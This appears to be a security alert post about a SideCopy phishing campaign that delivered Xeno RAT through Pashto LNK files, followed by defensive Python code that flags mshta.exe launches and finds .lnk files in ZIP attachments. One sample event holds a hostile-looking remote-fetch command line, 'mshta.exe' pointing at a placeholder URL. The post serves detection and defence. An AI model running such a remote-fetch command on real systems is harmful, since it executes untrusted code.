SideCopy targets Afghanistan's Ministry of Finance: Xeno RAT via LNK phishing in Pashto

Colleagues, an important cyber-security alert: SideCopy targeted Afghanistan's Ministry of Finance by sending ZIP archives containing LNK files in Pashto — Operation XENOFISCAL.
Brief:
- The LNK invoked mshta.exe to fetch an HTA from a compromised domain.
- Xeno RAT 1.8.7 is deployed via a DLL loader, persists through the registry and gives the operators remote control.
- Capabilities include SOCKS5 tunneling, keylogging, screenshots, camera/microphone access and artifact removal.
Why it matters: it shows a targeted campaign whose delivery chain depends on several breakable steps — attachment filtering and blocking mshta.exe are critical.
What practices do you employ to defend against such chains?
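Two checks that break the chain described above, written here as an added example (not code from the original post): flagging mshta.exe launches that pull remote content or start from explorer.exe, and spotting .lnk members inside ZIP attachments. The log events, file names and URL are constructed sample data.

```python
import io
import re
import zipfile

# Constructed sample process-creation events (Sysmon Event ID 1 style),
# not real telemetry from the incident.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/update.hta",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Program Files\Vendor\help.hta",
     "ParentImage": r"C:\Program Files\Vendor\app.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe report.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# A URL or UNC path passed to mshta means the HTA is fetched, not local.
REMOTE_ARG = re.compile(r"(https?://|\\\\[^\\]+\\)", re.IGNORECASE)

def flag_mshta_events(events):
    """Return (reason, event) pairs for mshta.exe launches worth triage.
    Remote HTA argument = the delivery chain above; explorer.exe parent = user
    double-clicked a shortcut. A local HTA from a normal parent is not flagged."""
    hits = []
    for ev in events:
        if not ev["Image"].lower().endswith("\\mshta.exe"):
            continue
        reasons = []
        if REMOTE_ARG.search(ev["CommandLine"]):
            reasons.append("mshta fetching remote content")
        if ev["ParentImage"].lower().endswith("\\explorer.exe"):
            reasons.append("launched from explorer (shortcut/double-click)")
        if reasons:
            hits.append(("; ".join(reasons), ev))
    return hits

def lnk_entries_in_zip(zip_bytes):
    """List .lnk members of a ZIP attachment (nested paths included) for mail filtering."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [n for n in zf.namelist() if n.lower().endswith(".lnk")]

def build_sample_zip():
    """Constructed attachment: a harmless text file plus a dummy .lnk entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("budget_2024.txt", "placeholder")
        zf.writestr("budget_2024.lnk", b"not a real shortcut")
    return buf.getvalue()
```

The same logic maps directly onto a SIEM rule (Image ends with mshta.exe AND CommandLine matches a URL) and a mail-gateway attachment policy.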
#cybersecurity #phishing #XenoRAT #APT

